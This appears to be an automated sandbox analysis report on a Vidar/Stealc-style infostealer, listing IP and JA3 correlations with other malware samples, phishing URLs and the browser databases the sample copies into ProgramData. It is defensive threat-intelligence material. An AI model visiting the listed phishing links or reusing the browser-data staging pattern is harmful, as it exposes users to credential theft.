	hloRQZmlfg.exe	Get hash	malicious	RDPWrap Tool	Browse	147.45.44.104
	T2bmenoX1o.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
VAKPoltavaUkraineUA	15PylGQjzK.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.90.97
	Ji7kZhlqxz.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.90.97
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.90.97
	VmRHSCaiyc.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.90.97
	T2bmenoX1o.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.90.97
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.90.97
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.90.97
	wULBz8VjH0.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	f1r6P3j3g7.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.90.97
	lCVFGKfczi.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
CLOUDFLARENETUS	Demande de proposition de AVANTAGE INDUSTRIEL INC.pdf	Get hash	malicious	HtmlDropper	Browse	104.18.95.41
	https://shorturl.at/yPmuH?sEBM=mt3zoN1Of	Get hash	malicious	Unknown	Browse	172.67.69.88
	https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw==	Get hash	malicious	HTMLPhisher	Browse	172.67.177.212
	https://google.com/amp/s/login.sharesyncportal.tech/dmYzPMej	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	yYk4nXhHaA.doc	Get hash	malicious	Unknown	Browse	188.114.96.3
	77IyY7nCKB.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	EDc1DW9OsQ.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	hPIF0APgJk.elf	Get hash	malicious	Unknown	Browse	172.64.209.9
	gkjeNrdkot.elf	Get hash	malicious	Mirai	Browse	172.68.102.190
	7paG4dIQuu.elf	Get hash	malicious	Mirai	Browse	1.12.2.185

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	https://salesf54b.myportfolio.com/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://1drv.ms/w/c/3e7c84f1a590a3e6/IQStDJr3bMEwQZDK5oU6uNI1AXa25ZxVanY0bWjgRrRk-d4	Get hash	malicious	Unknown	Browse	23.1.237.91
	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	23.1.237.91
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	23.1.237.91
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	23.1.237.91
	EY10AIvC8B.exe	Get hash	malicious	VIP Keylogger	Browse	23.1.237.91
	https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAg	Get hash	malicious	Unknown	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.1.237.91
	https://simpleinvoices.io/invoices/gvexd57Lej7	Get hash	malicious	Unknown	Browse	23.1.237.91
	FIR-069114.pdf	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
28a2c9bd18a11de089ef85a160da29e4	Demande de proposition de AVANTAGE INDUSTRIEL INC.pdf	Get hash	malicious	HtmlDropper	Browse	13.107.246.60
	https://shorturl.at/yPmuH?sEBM=mt3zoN1Of	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw==	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	77IyY7nCKB.xls	Get hash	malicious	Unknown	Browse	13.107.246.60
	EDc1DW9OsQ.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.60
	Atlanta Office Interiors #024-010.pdf	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://dc.dolshgdh.site/?Ufrj=g5	Get hash	malicious	Unknown	Browse	13.107.246.60
	EPAYMENT_Receipt.html	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://phisher-parts-production-us-east-1.s3.amazonaws.com/da08a569-c476-4c06-9e6f-9e3c8ae51232/2024-10-08/dm05v41jqt45dhgffdnn8f9og9hsqbgjjjhn2jo1/7abc4121254d93d61494ed63a8489e54fc18f49b8fee3f2e42bc06d8de3bd8f4?response-content-disposition=attachment%3B%20filename%3D%22Trailhead%20Media%2024-090.pdf%22%3B%20filename%2A%3DUTF-8%27%27Trailhead%2520Media%252024-090.pdf&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QGGSCSFZ4%2F20241008%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241008T163442Z&X-Amz-Expires=13860&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIDgEEKEw%2BhLGwBtqA9K8lbT2NL7hbWhvf2%2BPjyD670ZwAiEAjxudbMDljL%2FUqXOnRGbBuWM4gt9lBw1st5sI4FM7vZ8q%2FwMIRxAAGgw4MjMxOTMyNjU4MjQiDFL6sO98KdRGT%2FyB6ircA40orR%2Bw3i4U%2B9phl56wCil07vS%2BjAp0tNBfyQAkuYLNSI62vBzUSfUh8AtFx4keNf0RgCCwE%2F5gCyMz9dJzZLyDD2IAKWq0%2BZVLBi%2F7b8rVNUO1YeOio8ujPMfp7PNvhweEfhhY8gWxNds6w8BqlSQW47gyG6lKcp0A7mT5WgKaRXw1WeqCAEMdJCJlPtEma%2BQC5iWhRM0pLWgiBkR6hefhuzg2Tz54kHG3UNQwcDWAaKnjqYhM7zFoyV4AQaheZ%2FfeYnY1yedYoX4pPvs1ESF9JlWKqYxq45XmyrelrdgZHdinsHB9NygBDgLYdQlVcA8q8aEDwM5yaKxZUCkRDUT%2BJb0%2BCtt9rbu6zRC%2FVmZKIGqbIpVGNy4amYEf%2BnSXLUdz7lVpXGsb3kLoOghblbHcyVEfagdESdqIrQuvWG9mqEGbD0OQjdCwVx4Q4jbP%2F64E0vyYOxW5KEhabAoO8CQ4rv8pn47DEAsuKYtGkCRN%2FxqSxHV6ean9UbkBuNzcfqn%2FVpGx3A2uxr7Lyff7MJArWEMXsvfWi5LKjU8A8WeqnHljxyB6lsfFsi3p6KnjmkR9k7rwdRb2wdfEKvrkoq5%2B9cMWCTkzI1xSuI12GZdP74XfakNrsOJTGxzpMOaBlbgGOqUB6EOKQuRv4stEwpQj1THsV61McwaeBhcQW1ZeiHMR%2FPMuUFHOTfzikGnzEF0dw579Pv6WD2vyvq7i7uJv%2BRQQTqPgYSf6GCpXd%2Bpo4bQXTs9GoUG1Dv0s2Tos1ZBR6T7%2BCdAb%2F%2BMYiPDy86%2FFbh1RI6E5jnVh%2ByCIGL%2Bg53Mj67qwCe%2F7aw%2B6TyAnJVcGnug9ml35ow0E3Vc4ob87u3B9PwqgKEDQ&X-Amz-SignedHeaders=host&X-Amz-Signature=e4981c31034331c2fd0b62d9cfd5b86f4ce28daacc9bf862502fbb9c444389d2	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://salesf54b.myportfolio.com/	Get hash	malicious	Unknown	Browse	13.107.246.60
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.33.249 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 172.67.206.204
	77IyY7nCKB.xls	Get hash	malicious	Unknown	Browse	188.114.97.3 104.21.33.249 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.33.249 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 172.67.206.204
	EDc1DW9OsQ.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3 104.21.33.249 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 172.67.206.204
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse	188.114.97.3 104.21.33.249 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 172.67.206.204
	PWGen_[2MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.33.249 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.33.249 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.33.249 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 172.67.206.204
	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 104.21.33.249 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 172.67.206.204
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3 104.21.33.249 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 172.67.206.204
37f463bf4616ecd445d4a1937da06e19	rStopfodringer.exe	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.99
	H6s8pGsYjg.exe	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99
	asXlZG3aW6.exe	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99
	15PylGQjzK.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	Ji7kZhlqxz.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	Update.js	Get hash	malicious	NetSupport RAT	Browse	149.154.167.99
	file.exe	Get hash	malicious	Clipboard Hijacker, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	Transferencia 10-7-2024.exe	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.99
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	15PylGQjzK.exe	Get hash	malicious	LummaC, Vidar	Browse
	Ji7kZhlqxz.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	20fUAMt5dL.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AKEGIIJDGH.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	568400
Entropy (8bit):	7.712965594830316
Encrypted:	false
SSDEEP:	12288:KfhW/2ohbCZHkq5maGbAg/d1G0UL7ckKAm4F4Z/EA64fGETEO:KfUuohRqebAg/d1ZS7vKApFR7mt
MD5:	F56A4A7B59E1E81087BB64A4A70FB32F
SHA1:	441C37E16C00135C5CFA3F6E150136052C5B105C
SHA-256:	DEE89B739072D5BF4C3389E562FE1C8FE63D33DDC8990517F7E8EA5A3C852522
SHA-512:	29F6547886998395DE4E2BEA7D26251E47A587D6119CD794071A176095F1EDB0C970E6FD199B572D569A16DAF3AF77E8B43C67B62B8A5D88FB4FBD058E4AA31E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9.G.9.G.9.G.K.F.9.G.K.Fv9.G.K.F.9.G..F.9.G..F.9.G.K.F.9.G.9.G.9.G..F.9.G...F.9.G...F.9.GRich.9.G........PE..L....}.g...............).....>..............@....@.................................~}....@.....................................<...................(...(&...p..t.......................................@............@..0............................text....-.......................... ..`.rdata..r....@.......2..............@..@.data....y.......j..................@....reloc..t....p.......>..............@..B.rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAE\AECAKE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\BKFIJJEGHDAE\BGIIDA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAE\BGIIDA-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAE\BKFIJJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAE\BKFIJJ-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAE\CFHCGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAE\FHCAEG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAE\GDAAKF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAE\JDGIID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAE\JJDGCG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAE\KKECBF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAE\KKFBAA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_AKEGIIJDGH.exe_9e9db5a3ba65c0c81446a8288348bdcf886da82_0eee479a_26c218da-459e-4669-98bb-4c75383cb1ab\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7102831482031916
Encrypted:	false
SSDEEP:	96:qFF2My90jgssy4oI7Rh6tQXIDcQvc6QcEVcw3cE/v+HbHg/8BRTf3Oy1FhZAX/dU:GIP96gb0BU/oju1zuiFvZ24IO8P
MD5:	5766152945AB7CC3EEB8E014CD25097C
SHA1:	84F581F2C5167A922ACC9D40E568AD6D6FB26AC5
SHA-256:	523678C91FF0A6D8528CA672B15FCB8A4835900D3F98B46B090AC017C77654A8
SHA-512:	50D322EF87196DC620ACF3CA4096DCCEBEC266EE54603685CD0D055BE5269F1CE4396437C289CD1BE6135F35CF356D9282C5A833E0B889D48550ECB39DE1665B
Malicious:	true
